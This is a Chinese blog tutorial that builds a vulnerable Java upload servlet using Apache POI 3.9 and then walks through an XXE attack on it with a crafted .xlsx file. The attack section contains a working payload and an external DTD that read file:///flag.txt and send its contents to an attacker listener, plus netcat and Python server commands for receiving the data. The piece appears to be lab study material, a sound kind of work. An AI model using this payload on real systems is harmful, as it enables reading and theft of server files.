Excel中的XXE攻擊


Excel中的XXE攻擊

一、准備階段

所需環境 idea

原理:xslx文件是由xml文件組成的,可以改成.zip的文件后綴名進行解壓,所以如果如果沒有禁用外部實體,會存在XXE漏洞。poi這個依賴可以解析excel首先是解析xml,所以導致。

打開idea,創建一個maven環境

利用servlet進行
項目結構:

紅線划掉的為多余的,將1.jsp修改為index.jsp

二、依賴

將下面這段話復制到pom.xml里

<!-- https://mvnrepository.com/artifact/org.apache.poi/poi -->
        <!-- https://mvnrepository.com/artifact/org.apache.poi/poi-ooxml -->
        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>poi-ooxml</artifactId>
            <version>3.9</version>
        </dependency>

三、解析代碼

1、解析Excel(無回顯表中數據)

fileName:ExcelData

package com.shydow.servlet;

import org.apache.poi.ss.usermodel.Cell;
import org.apache.poi.ss.usermodel.Row;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;

public class ExcelData {
    public static void main(String[] args) throws IOException, InterruptedException {
        File excelFile = new File("C:\\Users\\HP\\Desktop\\ssr\\xlsx\\dnslog.xlsx");
        FileInputStream in = new FileInputStream(excelFile);

        XSSFWorkbook workbook = new XSSFWorkbook(in);

        XSSFSheet sheet = workbook.getSheetAt(0);
        int total = sheet.getLastRowNum();

        for(Row row : sheet){
            for (Cell cell : row){
                System.out.println(cell.getStringCellValue()+" ");
            }
            System.out.println("");
        }

    }
}

3、另一種(有回顯表中數據)

package com.xxetest.demo1;


import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

import java.io.FileInputStream;

public class ExcelDataController {

    private XSSFSheet sheet;

    /**
     * 構造函數,初始化excel數據
     *
     * @param filePath  excel路徑
     * @param sheetName sheet表名
     */
    ExcelDataController(String filePath, String sheetName) throws Exception {
        FileInputStream fileInputStream = null;
        fileInputStream = new FileInputStream(filePath);
        XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
        //獲取sheet
        sheet = sheets.getSheet(sheetName);

    }

    //打印excel數據

    public void readExcelData() {
        //獲取行數
        int rows = sheet.getPhysicalNumberOfRows();
        for (int i = 0; i < rows; i++) {
            //獲取列數
            XSSFRow row = sheet.getRow(i);
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                String cell = row.getCell(j).toString();
                System.out.println(cell);
            }
        }

    }


    public static void main(String[] args) throws Exception {
        ExcelDataController sheet1 = new ExcelDataController("C:\\Users\\HP\\Desktop\\ssr\\xlsx\\dnslog.xlsx", "Sheet1");

        sheet1.readExcelData();
    }
}

3、文件上傳(學習的狂學老師的java,https://www.kuangstudy.com/)

fileName:FileServlet

package com.xxetest.servlet;

import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.List;
import java.util.UUID;

import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.FileUploadException;
import org.apache.commons.fileupload.ProgressListener;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;

public class FileServlet extends HttpServlet {
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws javax.servlet.ServletException, IOException {
        //判斷上傳的表單是普通表單還是帶文件的表單,是返回true,否返回false;
        if (!ServletFileUpload.isMultipartContent(request)){
            return;//如果這是一個普通文件我們直接返回
        }//如果通過了這個if,說明我們的表單是帶文件上傳的

        //創建上傳文件的保存目錄,為了安全建議在WEB-INF目錄下,用戶無法訪問
        String uploadpath = this.getServletContext().getRealPath("WEB-INF/Upload");//獲取上傳文件的保存路徑
        File uploadfile = new File(uploadpath);
        if (!uploadfile.exists()){
            uploadfile.mkdir();//如果目錄不存在就創建這樣一個目錄
        }

        //臨時文件
        //臨時路徑,如果上傳的文件超過預期的大小,我們將它存放到一個臨時目錄中,過幾天自動刪除,或者提醒用戶轉存為永久
        String tmppath = this.getServletContext().getRealPath("WEB-INF/tmp");
        File file = new File(tmppath);
        if (!file.exists()){
            file.mkdir();//如果目錄不存在就創建這樣臨時目錄
        }
        //處理上傳的文件一般需要通過流來獲取,我們可以通過request.getInputstream(),原生態文件上傳流獲取,十分麻煩
        //但是我們都建議使用Apache的文件上傳組件來實現,common-fileupload,它需要依賴於common-io組件;

        try {
            //1、創建DiskFileItemFactory對象,處理文件上傳路徑或限制文件大小
            DiskFileItemFactory factory = gteDiskFileItemFactory(file);
            //2、獲取ServletFileUpload
            ServletFileUpload upload = getServletFileUpload(factory);
            //3、處理上傳文件
            String uuidFileName = UUID.randomUUID().toString();
            String msg = uploadParseRequest(upload,request,uploadpath,uuidFileName);

            //Servlet請求轉發消息
            request.setAttribute("msg",msg);
            request.getRequestDispatcher("/info.jsp").forward(request,response);
            ExcelData excel = new ExcelData();
            excel.test(uuidFileName);
        }catch (FileUploadException | InterruptedException e){
            e.printStackTrace();
        }
    }
    public static DiskFileItemFactory gteDiskFileItemFactory(File file){
        //1、創建DiskFileItemFactory對象,處理文件上傳路徑或限制文件大小
        DiskFileItemFactory factory = new DiskFileItemFactory();

        //通過這個工廠設置一個緩沖區,當上傳的文件大小大於緩沖區的時候,將它放到臨時文件中;
        factory.setSizeThreshold(1024 * 1024);//緩沖區大小為1M
        factory.setRepository(file);
        return factory;
    }
    public static ServletFileUpload getServletFileUpload(DiskFileItemFactory factory){
        //2、獲取ServletFileUpload
        ServletFileUpload upload = new ServletFileUpload(factory);
        //監聽文件上傳進度
        upload.setProgressListener(new ProgressListener() {
            public void update(long pBytesRead, long lpContentLenght, int i) {
                //pBytesRead:已讀取到的文件大小
                //pContentLenght:文件大小
                System.out.println("總大小:"+lpContentLenght+"已上傳:"+pBytesRead);
            }
        });

        //處理亂碼問題
        upload.setHeaderEncoding("UTF-8");
        //設置單個文件的最大值
        upload.setFileSizeMax(1024 * 1024 * 10);
        //設置總共能夠上傳文件的大小
        //1024 = 1kb * 1024 = 1M * 10 = 10M
        upload.setSizeMax(1024 * 1024 * 10);
        return upload;
    }
    public static String uploadParseRequest(ServletFileUpload upload,HttpServletRequest request,String uploadpath,String uuidFileName) throws IOException, FileUploadException {
        String msg = "";
        //3、處理上傳文件
        //把前端的請求解析,封裝成一個FileItem對象
        List<FileItem> fileItems = upload.parseRequest(request);
        for (FileItem fileItem : fileItems) {
            if (fileItem.isFormField()){ //判斷是普通表單還是帶文件的表單
                //getFieldName指的是前端表單控件的name
                String name = fileItem.getFieldName();
                String value = fileItem.getString("UTF-8");//處理亂碼
                System.out.println(name+":"+value);
            }else {//判斷它是帶文件的表單

                //======================處理文件=======================//

                //拿到文件的名字
                String uploadFileName = fileItem.getName();
                System.out.println("上傳的文件名:"+uploadFileName);

                if (uploadFileName.trim().equals("") || uploadFileName == null){
                    continue;
                }

                //獲得上傳的文件名,例如/img/girl/ooa.jpg,只需要ooa,其前面的后面的都不需要
                String fileName = uploadFileName.substring(uploadFileName.lastIndexOf("/") + 1);
                //獲得文件的后綴名
                String fileExtName = uploadFileName.substring(uploadFileName.lastIndexOf(".") + 1);
                      /*
                        如果文件后綴名fileExtName不是我們所需要的
                        就直接return,不處理,告訴用戶文件類型不對
                     */

                //可以使用UUID(唯一識別的通用碼),保證文件名唯一
                //UUID.randomUUID,隨機生一個唯一識別的通用碼

                //網絡傳輸中的東西,都需要序列化
                //pojo,實體類,如果想要在多個電腦運行,傳輸--->需要吧對象都序列化了
                //JNI=java Native Interface
                //implements Serializable :標記接口,JVM--->java棧 本地方法棧 native-->c++

                String uuidPath= UUID.randomUUID().toString();

                System.out.println("文件信息【文件名:"+fileName+"文件類型:"+fileExtName+"】");

                //可以使用UUID(唯一通用識別碼)來保證文件名的統一



                //=======================傳輸文件=========================//
                //獲得文件上傳的流
                InputStream inputStream = fileItem.getInputStream();

                //創建一個文件輸出流
                FileOutputStream fos = new FileOutputStream(uploadpath + "/" + uuidFileName +"."+ fileExtName);
                String fileName2 = uuidFileName+fileExtName;

                //創建一個緩沖區
                byte[] buffer = new byte[1024 * 1024];

                //判斷是否讀取完畢
                int len = 0;

                //如果大於0,說明還存在數據
                while ((len=inputStream.read(buffer))>0){
                    fos.write(buffer,0,len);
                }

                //關閉流
                fos.close();
                inputStream.close();

                msg = "文件上傳成功!";
                fileItem.delete();//上傳成功,清除臨時文件
            }
        }

        return msg;
    }
}


4、前端

fileName:index.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>
<form action="${pageContext.request.contextPath}/upload"
      enctype="multipart/form-data"
      method="post"
>
    <input type="text" name="username"><br/>
    <p><input type="file" name="file"></p>
    <p></p><input type="submit">|<input type="reset"></p>

</form>
</body>
</html>

fileName:info.jsp


<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>Title</title>
</head>
<body>

${msg}

</body>
</html>

四、攻擊准備階段

1、將你的xlsx文件的后綴名改為zip,進行解壓會得到

打開這個文件將payload加入第一行下面

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://自啟的文件服務器ip:端口/owen.dtd">
%remote;]>
<root/>

上傳文件,提交顯示文件上傳成功后,dns就會被解析
結果

五、實戰階段

思路
1、既然能解析dns,那訪問我的ip是否可以,利用xml引入外部實體,去加載我的文件
2、我的文件可不可以去讀取他的本地文件

1、按照上面說的我需要構建一個服務器

1、在你的vps(雲服務器)的/root下建立一個名為owen.dtd的文件
內容如下

<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://監聽ip:端口/?file=%file;'>">
%eval;
%error;

就是讓他去讀取根下目錄的flag.txt 然后向我的監聽端口發送一個請求,后面file的值就是讀出來的文件內容
流程如圖

2、開啟服務

利用python語句去開啟一個服務,訪問該服務可以看到/root下的文件

python -m SimpleHTTPServer 8099

3、開啟監聽端口

nc -lvv 8090


運行代碼

提交文件

接收到請求
而且監聽端口也收到了請求


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM